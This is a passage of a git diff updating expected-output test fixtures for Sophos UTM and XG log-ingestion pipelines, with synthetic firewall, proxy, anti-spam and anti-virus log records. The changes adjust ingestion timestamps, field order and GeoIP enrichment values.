5943:ddoei] AH02312: Fatal error initialising mod_ssl, nihi.", "event": { - "ingested": "2021-12-09T13:44:53.094277Z" + "ingested": "2021-12-14T14:54:42.826973455Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018:12:21-23:20:14 nostru774.corp URID: T=tatnonp ------ 1 - [exit] allow: natuserr", "event": { - "ingested": "2021-12-09T13:44:53.094283100Z" + "ingested": "2021-12-14T14:54:42.826973990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:1:5-06:22:49 ipsec_starter[6226]: IP address or index of physical interface changed -\u003e reinit of ipsec interface", "event": { - "ingested": "2021-12-09T13:44:53.094288900Z" + "ingested": "2021-12-14T14:54:42.826974381Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:1:19-13:25:23 httpd[5037]: [iadese:unknown] [pid isundeo:emq] [client rehender] ModSecurity: Warning. uat [file \"apa\"] [line \"tani\"] [id \"per\"] [rev \"ngelitse\"] [msg \"olorsita\"] [severity \"medium\"] [ver \"1.7102\"] [maturity \"apariat\"] [accuracy \"iuntNequ\"] [tag \"rExc\"] [hostname \"lorsita2216.www5.example\"] [uri \"turvelil\"] [unique_id \"velitsed\"]rau", "event": { - "ingested": "2021-12-09T13:44:53.094294500Z" + "ingested": "2021-12-14T14:54:42.826974767Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:2:2-20:27:57 sum2208.host reverseproxy: [eir] [nia:medium] [pid 4346:mco] [client ritinvol] [quioffi] mod_avscan_check_file_single_part() called with parameter filename=quamquae", "event": { - "ingested": "2021-12-09T13:44:53.094300200Z" + "ingested": "2021-12-14T14:54:42.826975171Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:2:17-03:30:32 ore6843.local reverseproxy: [usmodite] [aveniam:medium] [pid 5126:xplicab] [client taev] No signature found, cookie: dictasu", "event": { - "ingested": "2021-12-09T13:44:53.094305900Z" + "ingested": "2021-12-14T14:54:42.826975575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:3:3-10:33:06 Sedu1610.mail.corp reverseproxy: [audant] [porr:medium] [pid 7442:tation] [client uunturma] AH01114: cons: failed to make connection to backend: 10.177.35.133", "event": { - "ingested": "2021-12-09T13:44:53.094311700Z" + "ingested": "2021-12-14T14:54:42.826975966Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:3:17-17:35:40 corpo6737.example reverseproxy: [officiad] [aliquide:very-high] [pid 6600:errorsi] [client raincidu] [orincidi] cannot connect: failure (111)", "event": { - "ingested": "2021-12-09T13:44:53.094319Z" + "ingested": "2021-12-14T14:54:42.826976349Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:4:1-00:38:14 pop3proxy[6854]: Master started", "event": { - "ingested": "2021-12-09T13:44:53.094324900Z" + "ingested": "2021-12-14T14:54:42.826976735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:4:15-07:40:49 eratvol314.www.home pop3proxy: Master started", "event": { - "ingested": "2021-12-09T13:44:53.094330700Z" + "ingested": "2021-12-14T14:54:42.826977126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:4:29-14:43:23 utemvele1838.mail.test reverseproxy: [xplicabo] [aco:high] [pid 2389:ratione] [client nrepr] ModSecurity: Warning. uipex [file \"alorumw\"] [line \"nibus\"] [id \"eiusmo\"] [msg \"rci\"] [hostname \"seosquir715.local\"] [uri \"ercitati\"] [unique_id \"uiration\"]", "event": { - "ingested": "2021-12-09T13:44:53.094336500Z" + "ingested": "2021-12-14T14:54:42.826977517Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:5:13-21:45:57 ulapari2656.local reverseproxy: [itessec] [non:very-high] [pid 2237:licaboN] [client nvol] [moenimip] cannot connect: failure (111)", "event": { - "ingested": "2021-12-09T13:44:53.094342200Z" + "ingested": "2021-12-14T14:54:42.826977912Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:5:28-04:48:31 reverseproxy[4278]: [ritat] [iscinge:very-high] [pid 4264:rroquisq] [client tnonpro] [nimv] erunt while reading reply from cssd, referer: https://example.org/etcon/ipitlab.gif?utlabore=suscipi#tlabor", "event": { - "ingested": "2021-12-09T13:44:53.094347900Z" + "ingested": "2021-12-14T14:54:42.826978306Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:6:11-11:51:06 URID[7418]: T=xer ------ 1 - [exit] cancel: onemul", "event": { - "ingested": "2021-12-09T13:44:53.094353500Z" + "ingested": "2021-12-14T14:54:42.826978695Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:6:25-18:53:40 pluto[7201]: | handling event ips for 10.165.217.56 \"econse\" #otamr", "event": { - "ingested": "2021-12-09T13:44:53.094359200Z" + "ingested": "2021-12-14T14:54:42.826979098Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:7:10-01:56:14 stla2856.host reverseproxy: [onpro] [adolo:very-high] [pid 7766:siste] ModSecurity for Apache/nisiut (ostr) configured.", "event": { - "ingested": "2021-12-09T13:44:53.094364900Z" + "ingested": "2021-12-14T14:54:42.826979501Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:7:24-08:58:48 peri6748.www5.domain reverseproxy: [cingeli] [esseq:high] [pid 2404:aquae] AH00098: pid file otamrema overwritten -- Unclean shutdown of previous Apache run?", "event": { - "ingested": "2021-12-09T13:44:53.094370600Z" + "ingested": "2021-12-14T14:54:42.826979904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:8:7-16:01:23 tnon5442.internal.test reverseproxy: [ive] [tquido:very-high] [pid 6108:taliquip] AH00295: caught accept, ectetu", "event": { - "ingested": "2021-12-09T13:44:53.094376300Z" + "ingested": "2021-12-14T14:54:42.826980295Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:8:21-23:03:57 ariatu2606.www.host reverseproxy: [quamestq] [umquid:very-high] [pid 7690:rem] [client its] [inv] not all the file sent to the client: rin, referer: https://example.org/tation/tutlabo.jpg?amvo=ullamco#tati", "event": { - "ingested": "2021-12-09T13:44:53.094382100Z" + "ingested": "2021-12-14T14:54:42.826980692Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:9:5-06:06:31 imv1805.api.host ulogd: id=oenim severity=very-high sys=iaturExc sub=orsit name=ICMP flood detected action=cancel fwrule=eos seq=quameius initf=lo4665 outitf=lo3422 dstmac=01:00:5e:d6:f3:bc srcmac=01:00:5e:87:02:08 srcip=10.96.243.231 dstip=10.248.62.55 proto=ugiat length=quiin tos=apar prec=eleumiur ttl=chite srcport=5632 dstport=4206 tcpflags=tevelit info=etc code=lorem type=temvele", "event": { - "ingested": "2021-12-09T13:44:53.094387900Z" + "ingested": "2021-12-14T14:54:42.826981075Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:9:19-13:09:05 rita600.www5.localdomain reverseproxy: [ini] [elite:high] [pid 7650:mnisiut] AH00959: ap_proxy_connect_backend disabling worker for (10.132.101.158) for cipitlabs", "event": { - "ingested": "2021-12-09T13:44:53.094393600Z" + "ingested": "2021-12-14T14:54:42.826981470Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:10:3-20:11:40 sshd[2014]: Did not receive identification string from rroq", "event": { - "ingested": "2021-12-09T13:44:53.094399300Z" + "ingested": "2021-12-14T14:54:42.826981856Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:10:18-03:14:14 admini1122.www.local reverseproxy: [ritte] [umwritte:very-high] [pid 1817:atu] (13)failure: [client vol] AH01095: prefetch request body failed to 10.96.193.132:5342 (orumwr) from bori ()", "event": { - "ingested": "2021-12-09T13:44:53.094405Z" + "ingested": "2021-12-14T14:54:42.826982243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:11:1-10:16:48 confd[2475]: id=utaliqu severity=low sys=xplicabo sub=quamni name=dol client=sisten facility=remeumf user=acommod srcip=10.96.200.83 version=1.7416 storage=sper object=asia class=roident type=olorem attributes=teursintcount=evelites node=nostr account=lapariat", "event": { - "ingested": "2021-12-09T13:44:53.094410800Z" + "ingested": "2021-12-14T14:54:42.826982625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:11:15-17:19:22 emvel4391.localhost sshd: Did not receive identification string from quelaud", "event": { - "ingested": "2021-12-09T13:44:53.094416500Z" + "ingested": "2021-12-14T14:54:42.826983021Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:11:30-00:21:57 confd-sync[5454]: id=smodite severity=high sys=utpersp sub=rnatu name=ico", "event": { - "ingested": "2021-12-09T13:44:53.094422200Z" + "ingested": "2021-12-14T14:54:42.826983407Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019:12:14-07:24:31 untinc5531.www5.test sshd: error: Could not get shadow information for NOUSER", "event": { - "ingested": "2021-12-09T13:44:53.094427800Z" + "ingested": "2021-12-14T14:54:42.826983795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json index 88c4c6cf9dd..64ba1718103 100644 --- a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json +++ b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json @@ -72,7 +72,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714793100Z", + "ingested": "2021-12-14T14:54:45.179828242Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:48 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041101618035 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"firewall@firewallgate.com\" to_email_address=\"Sysadmin@elasticuser.com\" email_subject=\"*ALERT* Sophos XG Firewall\" mailid=\"qkW2Y6-LxBk6U-vH-1590055245\" mailsize=19728 spamaction=\"QUEUED\" reason=\"Email has been accepted by Device and queued for scanning.\" src_domainname=\"elasticuser.com\" dst_domainname=\"\" src_ip=\"\" src_country_code=\"\" dst_ip=\"\" dst_country_code=\"\" protocol=\"TCP\" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041101618035", "kind": "event", @@ -99,19 +99,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -124,28 +119,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 52742, - "bytes": 0, - "ip": "175.16.199.1", - "domain": "constant-big.email", "user": { "email": "telekommunikation@constant-big.email" - } + }, + "bytes": 0, + "ip": "175.16.199.1", + "domain": "constant-big.email" }, "tags": [ "preserve_original_event" @@ -199,7 +189,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714802Z", + "ingested": "2021-12-14T14:54:45.179830780Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"\u003cMzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041105613003", "kind": "event", @@ -226,19 +216,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -251,28 +236,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 51789, - "bytes": 0, - "ip": "175.16.199.1", - "domain": "17buddies.net", "user": { "email": "ripxfc@17buddies.net" - } + }, + "bytes": 0, + "ip": "175.16.199.1", + "domain": "17buddies.net" }, "tags": [ "preserve_original_event" @@ -326,7 +306,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714808300Z", + "ingested": "2021-12-14T14:54:45.179831235Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"\u003coE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=BRA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041107413001", "kind": "alert", @@ -355,19 +335,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -380,28 +355,23 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 55002, - "bytes": 0, - "ip": "175.16.199.1", - "domain": "ELTOBGI.COM", "user": { "email": "SHERIF.TOBGI@ELTOBGI.COM" - } + }, + "bytes": 0, + "ip": "175.16.199.1", + "domain": "ELTOBGI.COM" }, "tags": [ "preserve_original_event" @@ -455,7 +425,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714814200Z", + "ingested": "2021-12-14T14:54:45.179831652Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"\u003c20200518070235.C1623996C64F9957@ELTOBGI.COM\u003e\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"", "code": "045908413004", "kind": "alert", @@ -550,7 +520,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714820100Z", + "ingested": "2021-12-14T14:54:45.179832050Z", "original": "device=\"SFW\" date=2017-01-31 time=18:34:41 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041113413005 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"Gaurav123\" from_email_address=\"gaurav1@iview.com\" to_email_address=\" gaurav2@iview.com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003ca22c9da6-19e5-4764-2836-3f48d7dcc329@iview.com\u003e\" mailsize=405 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041113413005", "kind": "alert", @@ -645,7 +615,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714826Z", + "ingested": "2021-12-14T14:54:45.179832450Z", "original": "device=\"SFW\" date=2018-06-06 time=11:10:11 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041114413006 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Probable Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"rule 8\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"RPD Spam test: Bulk\" mailid=\"\u003cc63b1eb2-1c17-73ac-fcc3- 20e8831dc3d3@postman.local\u003e\" mailsize=439 spamaction=\"Drop\" reason=\"Mail detected as OUTBOUND PROBABLE SPAM.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041114413006", "kind": "alert", @@ -740,7 +710,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714831800Z", + "ingested": "2021-12-14T14:54:45.179832829Z", "original": "device=\"SFW\" date=2018-06-06 time=12:50:07 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041121613009 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"DLP\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman. local\" email_subject=\"Fwd: TESt\" mailid=\"c0000002-1528269606\" mailsize=5041 spamaction=\"DROP\" reason=\"Email containing confidential data detected. Relevant Data Protection Policy applied.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"DLP\"", "code": "041121613009", "kind": "alert", @@ -835,7 +805,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.714838100Z", + "ingested": "2021-12-14T14:54:45.179833215Z", "original": "device=\"SFW\" date=2018-06-06 time=12:51:34 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041122613010 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"SPX\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"[secure:pankhil]\" mailid=\"c0000003-1528269693\" mailsize=442 spamaction=\"Accept\" reason=\"SPX Template of type Specified by Sender successfully applied on Email.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.16.204 dst_country_code=R1 protocol=\"TCP\" src_port=60298 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041122613010", "kind": "event", @@ -919,7 +889,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714843900Z", + "ingested": "2021-12-14T14:54:45.179833585Z", "original": "device=\"SFW\" date=2018-06-06 time=12:53:39 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041123413012 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Dos\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"\" to_email_address=\"\" email_subject=\"\" mailid=\"\" mailsize=0 spamaction=\"TMPREJECT\" reason=\"SMTP DoS\" src_domainname=\"\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60392 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041123413012", "kind": "alert", @@ -1013,7 +983,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714849800Z", + "ingested": "2021-12-14T14:54:45.179833963Z", "original": "device=\"SFW\" date=2018-06-06 time=12:56:53 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041102413014 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Denied\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil1@postman.local\" to_email_address=\"pankhil@postman. local\" email_subject=\"Fwd: test sand\" mailid=\"c0000008-1528270010\" mailsize=419835 spamaction=\"DROP\" reason=\"Email is marked Malicious by Sophos Sandstorm.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60608 dst_port=25 sent_bytes=0 recv_bytes=0", "code": "041102413014", "kind": "alert", @@ -1109,7 +1079,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.714855600Z", + "ingested": "2021-12-14T14:54:45.179834342Z", "original": "device=\"SFW\" date=2017-01-31 time=18:31:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041207414001 log_type=\"Anti-Spam\" log_component=\"POP3\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"GauravPatel\" from_email_address=\"gaurav1@iview.com\" to_email_address=\"gaurav2@iview. com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003c2a2dd5d4-1a30-617b-27b1-7961ad07cf07@iview.com\u003e\" mailsize=574 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"iview.com\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22333 dst_port=110 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041207414001", "kind": "alert", @@ -1138,19 +1108,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -1163,19 +1128,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57695, @@ -1240,7 +1200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.714861800Z", + "ingested": "2021-12-14T14:54:45.179834909Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:33 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"Sandstorm\" url=\"http://sophostest.com/Sandstorm/SBTestFile1.pdf\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" src_port=57695 dst_port=80 sent_bytes=550 recv_bytes=1616 user_agent=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36\" status_code=403", "code": "030906208001", "kind": "alert", @@ -1272,19 +1232,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -1297,19 +1252,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 57835, @@ -1374,7 +1324,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.714867800Z", + "ingested": "2021-12-14T14:54:45.179835311Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:34 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=030906208001 log_type=\"Anti-Virus\" log_component=\"HTTP\" log_subtype=\"Virus\" status=\"\" priority=Critical fw_rule_id=2 user_name=\"\" iap=13 av_policy_name=\"\" virus=\"EICAR-AV-Test\" url=\"http://sophostest.com/eicar/index.html\" domainname=\"sophostest.com\" src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=USA protocol=\"TCP\" 